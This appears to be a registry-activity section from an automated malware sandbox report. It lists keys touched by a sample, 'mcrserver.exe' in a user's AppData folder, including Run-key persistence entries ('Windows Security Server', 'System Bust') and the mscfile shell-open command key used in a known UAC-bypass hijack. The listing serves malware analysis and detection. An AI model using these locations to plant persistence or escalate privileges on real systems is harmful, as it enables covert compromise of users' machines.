HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command\command
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\cmd.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UsePathEnvVarForCommandTemplates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PropertyBag
HKEY_CURRENT_USER\Software\Classes\mscfile\Progid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellCompatibility\ProgIDs\MSCFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\InheritConsoleHandles
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\ddeexec
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\SetWorkingDirectoryFromTarget
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\NoWorkingDirectory
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcrserver.exe
HKEY_CURRENT_USER\Software\Classes\AppID\mcrserver.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\39D25951
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|mcrserver.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|mcrserver.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|mcrserver.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\mcrserver_RASAPI32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\mcrserver_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\36e0e30a\5f80db31
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\System Bust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\36e0e30a\8832e07
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\433351e7\2db83a0b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\433351e7\26b4a30
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Control Panel\Desktop
HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index148\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index148\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CseOn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\TailCallOpt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\PInvokeInline
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\PInvokeCalliOpt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NewGCCalc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\TURNOFFDEBUGINFO
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableHotCold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\61e7e666\c991064\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2dd6ac50\163e1f5e\8a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2dd6ac50\163e1f5e\8a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2dd6ac50\163e1f5e\8a\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2dd6ac50\163e1f5e\8a\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2dd6ac50\163e1f5e\8a\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3ced59c5\1b2590b1\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3ced59c5\1b2590b1\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3ced59c5\1b2590b1\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3ced59c5\1b2590b1\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3ced59c5\1b2590b1\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\3cca06a0\6dc7d4c0\84\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\6dc7d4c0\a5cd4db\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\ConfigMask
